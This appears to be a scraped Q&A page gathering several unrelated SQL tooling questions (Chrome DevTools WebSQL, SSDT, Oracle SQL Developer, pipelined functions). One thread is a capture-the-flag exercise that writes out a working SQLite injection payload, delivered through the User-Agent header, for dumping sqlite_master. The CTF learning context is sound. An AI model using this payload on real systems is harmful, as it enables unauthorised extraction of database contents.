Chrome's Developer Tools have a handy prompt on the Resources page where I can execute SQL on my actual WebSQL database. But if the SQL is parameterised like this:
select * from SomeTable where ImportantField = ?
I get a message like this:
Number of '?'s in statement string does not match argument count
I know this is a SQLite message, but I don't see an obvious way to supply the arguments in Chrome Dev Tools. Is it possible?
You are not possibly trying to execute that SQL as-is on the prompt, are you ?
If yes, then obviously you are wrong.
why do you care about ? when you are executing your SQL on console, why not simply use the value.
select * from SomeTable where ImportantField = 'yourValue'
Related
I've been attempting to increase my knowledge and trying out some challenges. I've been going at this for a solid two weeks now finished most of the challenge but this one part remains. The error is shown below, what am i not understanding?
Error in sqlite query: update users set last_browser= 'mozilla' + select sql from sqlite_master'', last_time= '13-04-2019' where id = '14'
edited for clarity:
I'm trying a CTF challenge and I'm completely new to this kind of thing so I'm learning as I go. There is a login page with test credentials we can use for obtaining many of the flags. I have obtained most of the flags and this is the last one that remains.
After I login on the webapp with the provided test credentials, the following messages appear: this link
The question for the flag is "What value is hidden in the database table secret?"
So from the previous image, I have attempted to use sql injection to obtain value. This is done by using burp suite and attempting to inject through the user-agent.
I have gone through trying to use many variants of the injection attempt shown above. Im struggling to find out where I am going wrong, especially since the second single-quote is added automatically in the query. I've gone through the sqlite documentation and examples of sql injection, but I cannot sem to understand what I am doing wrong or how to get that to work.
A subquery such as select sql from sqlite_master should be enclosed in brackets.
So you'd want
update user set last_browser= 'mozilla' + (select sql from sqlite_master''), last_time= '13-04-2019' where id = '14';
Although I don't think that will achieve what you want, which isn't clear. A simple test results in :-
You may want a concatenation of the strings, so instead of + use ||. e.g.
update user set last_browser= 'mozilla' || (select sql from sqlite_master''), last_time= '13-04-2019' where id = '14';
In which case you'd get something like :-
Thanks for everyone's input, I've worked this out.
The sql query was set up like this:
update users set last_browser= '$user-agent', last_time= '$current_date' where id = '$id_of_user'
edited user-agent with burp suite to be:
Mozilla', last_browser=(select sql from sqlite_master where type='table' limit 0,1), last_time='13-04-2019
Iterated with that found all tables and columns and flags. Rather time consuming but could not find a way to optimise.
When using SSDT what I miss most is the ability to script the select statement of the top x rows like in SSMS.
Does anyone know if it's possible to turn that on somehow by an powertool or extension that enables the "Script As" functionality in SSDT?
You can right-click a database in the SQL Server Object Explorer (part of SSDT) and choose "New Query..." to get a query window. From there you can write and execute any query you like.
I've also got Redgate's SQL Prompt installed (I work for them), so typing "st100" gets me a top X query quickly -- the built-in intellisense may have something similar.
Is there any way to see what the SQL looks like after the parameters are resolved?
For example here is a small part of my SQL:
([Event].[Start_Time] LIKE #StartTimeValue)
And my parm:
SqlDataSourceObject.SelectParameters.Add("StartTimeValue", TypeCode.DateTime, StartTimeValue)
But what does the final SQL look like when the parm #StartTimeValue is replaced with the value in StartTimeValue?
How can I see that?
Thanks for your help.
Do you have access to the database server? From there you could run a tool like SQL Profiler.
Another way is to set a break point just before the query is executed and examine the variables that went in. Usually the issue lies somewhere with the variables you're passing in (they are null, etc) and not with the resolved query itself. You could also set it up in a SQL query window like so:
-- Declare the variable to be used.
DECLARE #StartTimeValue datetime;
-- Initialize the variable.
SET #StartTimeValue = '<PASTE VARIABLE VALUE YOU GOT FROM DEBUGGING HERE>';
SELECT * FROM [Event] WHERE ([Event].[Start_Time] LIKE #StartTimeValue);
I am a newb to Oracle. I used to use SQL Plus, and use set serveroutput on to see the results. However, when I started using Oracle Developer, my queries would run, however, I was not able to see the console or the results:
select *
from customer;
I assume that you mean "Oracle SQL Developer" application.
If yes, the in SQL Developer click on View option, then select Dbms output
DBMS Output window (panel) should appear somewhere on the screen.
Then, click on green plus sing in the DBMS-Output panel, and select a session you want to spy.
How can I view the results returned by a pipelined function in Oracle SQL Developer ?
I'm invoking the function using a simple select..from dual like
select piaa_extract.FN_PIAA_EXTRACT('01-JAN-00','01-JAN-12') FROM DUAL
and the result I get is
IQCFINAL.REC_PIAA(IQCFINAL.REC_PIAA,IQCFINAL.REC_PIAA,.....,IQCFINAL.REC_PIAA)
Allround Automations' PL/SQL developer displays the results beautifully in a tabular format, but I do not have a license for the full version of PL/SQL developer.
SQL*Plus' output isn't very good either, though better than Oracle SQL Developer's.
Any thoughts ?
Typically, you'd use
select * from table(piaa_extract.FN_PIAA_EXTRACT('01-JAN-00','01-JAN-12'))
Does that work?